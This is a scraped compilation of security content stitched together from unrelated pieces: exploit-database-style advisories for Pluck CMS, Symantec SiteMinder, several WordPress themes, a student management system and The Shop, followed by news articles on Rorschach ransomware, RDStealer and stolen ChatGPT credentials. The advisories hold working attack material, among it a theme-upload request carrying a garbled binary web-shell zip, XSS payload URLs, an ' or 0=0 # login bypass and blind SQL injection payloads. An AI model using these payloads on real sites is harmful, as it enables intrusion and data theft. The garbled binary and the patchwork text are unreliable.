File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme  
Demo:  
After the installation is successful, go to the management background.  
  
options->choose theme->install theme  
  

vul-url：  
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall  
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:  
  
Insert phpinfo(); in the theme.php file;  

upload

    POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
    Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------------------------10771789627341
    Content-Length: 2441
    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
    Content-Type: application/x-zip-compressed
    
    PK���     楽VO            
       shell.php/PK���   � 漇VO?K�?   ��  �   shell.php/info.phpe幧
    ?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
    �?0?z?�N%???
    ?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK���   � 嫇OO蘺貔{�  ?  �   shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�唋音凿惸虥?笃N溃=??p鴾�^f?r婆
    M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?檢n垭"荙D长?�?歭?y嬟〕
    罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_	?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍	8?$=睋
    瀭?T窰1[�m觊D))
    ?还^gT�€�郪�3
    蚾€i擣 服h爓,(英?_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK���   � 筍VO鱪鷸?  ?  �   shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
    ~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?�-?Mw	撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
    3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐	灛輁X;i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? �     楽VO            
     $       �       shell.php/
           � � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? �   � 漇VO?K�?   ��  � $           (   shell.php/info.php
           � � �4=t€堈�u�7瘈堈�]�?|堈�PK��? �   � 嫇OO蘺貔{�  ?  � $           ��  shell.php/style.css
           � � €怷DC冋�)A7瘈堈��l洹|堈�PK��? �   � 筍VO鱪鷸?  ?  � $           ?  shell.php/theme.php
           � � 9晸€堈�yg7瘈堈�?察z堈�PK��    � � ?  ?    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="submit"
    
    Upload
    -----------------------------10771789627341--
    
    

**1.default theme**

  
View site  

**2.choose shell.php theme**

  

View site http://192.168.80.1/pluck-4.7.10-dev3/  

phpinfo();Function is executed

_**The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version**_

CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

CVE-2020-21058: typora(0.9.79) XSS to RCE · Issue #2959 · typora/typora-issues

Learn how the latest ransomware variant has heightened attack execution speed and what that means for cybersecurity operations.

There has always been a competition in the ransomware world, with attackers trying to improve the speed of campaign execution and organizations continuously innovating to get ahead of those attacks. Speed is so decisive that ransomware-as-a-service (RaaS) platforms even advertise the speed of execution for prospective ransomware affiliates. LockBit, one of the most successful ransomware groups, has publicly listed its encryption speed versus its competitors' speed to demonstrate its advantage. In short, speed is critical on both sides of the ransomware battle.

Rorschach, one of the newest ransomware variants, has officially taken the "encryption speed king" title from LockBit 3.0. The Rorschach variant was first detected in April 2023 and is a customized strain of the Babuk ransomware code. Rorschach brings speed into the spotlight and warrants a closer look at how ransomware creators increase speed across multiple dimensions of their victims' environment.

**Malware Propagation Speed**

One important speed component is the ability to quickly spread malware as far and wide as possible. In the past, ransomware groups have leveraged many techniques for fast propagation, including supply chain attacks and using existing IT and security tools to propagate their malware.

However, Rorschach has built and demonstrated an interesting self-propagating and autonomous capability that leverages Active Directory (AD) Domain Group Policy Objects (GPO). This enables the malware to rapidly propagate across the network and execute ransomware on every endpoint at blistering speeds. Because of this, the Rorschach variant has pushed the needle further than ever with these interesting innovations for self-propagation.

To counter this innovation, organizations must adopt tools that combat self-propagation, such as active defense technology, which deals with ransomware in real time and detects attackers as soon as possible.

**Data Encryption Speed for Extortion**

On Windows endpoints, Rorschach's creators have carefully chosen to use HC-128, a stream cipher that encrypts large streams of file data with impressive performance. Rorschach ransomware uses the asymmetric key exchange method, which is based on Curve25519. It's efficient in both computational performance and memory consumption while simultaneously retaining strong security.

Like many other ransomware strains, including LockBit and Babuk, Rorschach encrypts only parts of a file instead of the entire file's contents. This tactic is known as intermittent encryption, which has become popular in the last couple of years for its efficiency and speed. Encrypting only parts of the file dramatically reduces the time required to complete the data encryption. By shortening the encryption phase of an attack, ransomware operators give security tools less opportunity to detect them. Data encryption is the visible part of an attack, and attackers are shortening that window to better their odds in the race against defenders.

Like LockBit and other well-known ransomware, Rorschach also leverages parallelism and multithreading for high-performance speedy encryption. Because Rorschach ransomware implementation is customized for each operating system type, it leverages specific Windows capabilities known as I/O completion ports for efficient multithreaded encryption. This technique is borrowed from LockBit 3.0, REvil, Hive, BlackMatter, and DarkSide.

While the data encryption speed rankings among ransomware gangs is interesting, it is important to note that virtually all modern ransomware variants already perform data encryption very quickly. Unfortunately, all are much faster than what most security teams or tools are equipped to deal with.

However, while Rorschach does outpace competitors in speed in some realms, it currently does not appear to exfiltrate data for double extortion. This is in comparison to other ransomware gangs, including LockBit, that first exfiltrate enterprise data. While data encryption is the visible part of a ransomware attack, data exfiltration is the invisible race against defenders. Ransomware actors typically exfiltrate large amounts of data for double extortion before beginning data encryption.

**Staying Under the Radar of Defenders**

One of Rorschach's particularly innovative moves is its ability to stay under the radar by using deception technology — a double-edged sword that is useful for attackers and defenders. Rorschach's advanced security evasion capabilities leverage deception techniques and concepts for malicious purposes, including using obfuscation techniques, valid domain user and service accounts, and argument spoofing techniques to hide the true capabilities of the ransomware.

This kind of defense evasion is new to ransomware threats, but it's not new in the cybersecurity world. To combat Rorschach's technique for self-propagation using AD GPOs and high-speed campaigns, defenders need solutions that can detect and respond to real-time, novel, and autonomous ransomware capabilities.

Rorschach ransomware has borrowed innovations from previously successful ransomware groups including LockBit, Babuk, and REvil and built on their success by adding lightning-fast innovations. The Rorschach variant demonstrates the importance of continuous defender innovation, as well as the need to counter attacker movement in real time.

Rorschach Ransomware: What You Need to Know

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

WordPress Theme Medic 1.0.0 Weak Password Recovery Mechanism

WordPress Kero jQuery/HTML Dashboard PRO theme version 2.3.86 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WordPress - Kero jQuery/HTML Dashboard PRO Auth BY pass Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://dashboardpack.com/theme-details/kero-jquery-html-dashboard-pro/                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /panel/sign-in.php[+] User & Pass :  ' or 0=0 #[+] https://127.0.0.1/spdmuniversal.in/panel/sign-in.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Kero jQuery/HTML Dashboard PRO 2.3.86 SQL Injection

Student Study Center Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)# Date of found: 12/05/2023# Exploit Author: VIVEK CHOUDHARY @sudovivek# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/# CVE: CVE-2023-33580# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580Vulnerability Description -    The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.Steps to Reproduce -    The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:            1.  Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.        2.  Click on the "Admin" button to navigate to the admin login page.        3.  Login to the Admin account using the default credentials.                - Username: admin                - Password: Test@123        4.  Proceed to the Admin Profile page.        5.  Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.        6.  Click on the "Submit" button.        7.  Refresh the page, and the injected payload will be executed.As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

Student Study Center Management System 1.0 Cross Site Scripting

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

    # Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}

The Shop 2.5 SQL Injection

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer.
"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.
Evidence gathered by the Romanian

A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called **RDStealer**.

"The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News.

Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia.

In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection.

A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads.

One of the sub-folders in question is "C:\\Program Files\\Dell\\CommandUpdate," which is the directory for a legitimate Dell application called Dell Command | Update.

Bitdefender said all the machines infected over the course of the incident were manufactured by Dell, suggesting that the threat actors deliberately chose this folder to camouflage the malicious activity.

This line of reasoning is bolstered by the fact that the threat actor registered command-and-control (C2) domains such as "dell-a\[.\]ntp-update\[.\]com" with the goal of blending in with the target environment.

The intrusion set is characterized by the use of a server-side backdoor called RDStealer, which specializes in gathering clipboard content and keystroke data from the host.

But what makes it stand out is its capability to "monitor incoming RDP \[Remote Desktop Protocol\] connections and compromise a remote machine if client drive mapping is enabled."

Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome.

"This highlights the fact that threat actors actively seek credentials and saved connections to other systems," Bitdefender's Marin Zugec said in a second analysis.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

What's more, the connecting RDP clients are infected with another Golang-based custom malware known as Logutil to maintain a persistent foothold on the victim network using DLL side-loading techniques and facilitate command execution.

Not much is known about the threat actor other than the fact that it has been active dating back to at least 2020.

"Cybercriminals continually innovate and explore novel methods to enhance the reliability and stealthiness of their malicious activities," Zugec said.

"This attack serves as a testament to the increasing sophistication of modern cyber attacks, but also underscores the fact that threat actors can leverage their newfound sophistication to exploit older, widely adopted technologies."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.
The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.
"The number of

Endpoint Security / Password

Over 100,000 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials.

The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News.

"The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said. "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year."

Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh.

A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealer, followed by Vidar and RedLine.

Information stealers have become popular among cybercriminals for their ability to hijack passwords, cookies, credit cards, and other information from browsers, and cryptocurrency wallet extensions.

"Logs containing compromised information harvested by info stealers are actively traded on dark web marketplaces," Group-IB said.

"Additional information about logs available on such markets includes the lists of domains found in the log as well as the information about the IP address of the compromised host."

Typically offered based on a subscription-based pricing model, they have not only lowered the bar for cybercrime, but also serve as a conduit for launching follow-on attacks using the siphoned credentials.

"Many enterprises are integrating ChatGPT into their operational flow," Dmitry Shestakov, head of threat intelligence at Group-IB, said.

"Employees enter classified correspondences or use the bot to optimize proprietary code. Given that ChatGPT's standard configuration retains all conversations, this could inadvertently offer a trove of sensitive intelligence to threat actors if they obtain account credentials."

To mitigate such risks, it's recommended that users follow appropriate password hygiene practices and secure their accounts with two-factor authentication (2FA) to prevent account takeover attacks.

The development comes amid an ongoing malware campaign that's leveraging fake OnlyFans pages and adult content lures to deliver a remote access trojan and an information stealer called DCRat (or DarkCrystal RAT), a modified version of AsyncRAT.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"In observed instances, victims were lured into downloading ZIP files containing a VBScript loader which is executed manually," eSentire researchers said, noting the activity has been underway since January 2023.

"File naming convention suggests the victims were lured using explicit photos or OnlyFans content for various adult film actresses."

It also follows the discovery of a new VBScript variant of a malware called GuLoader (aka CloudEyE) that employs tax-themed decoys to launch PowerShell scripts capable of retrieving and injecting Remcos RAT into a legitimate Windows process.

"GuLoader is a highly evasive malware loader commonly used to deliver info-stealers and Remote Administration Tools (RATs)," the Canadian cybersecurity company said in a report published earlier this month.

"GuLoader leverages user-initiated scripts or shortcut files to execute multiple rounds of highly obfuscated commands and encrypted shellcode. The result is a memory-resident malware payload operating inside a legitimate Windows process."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows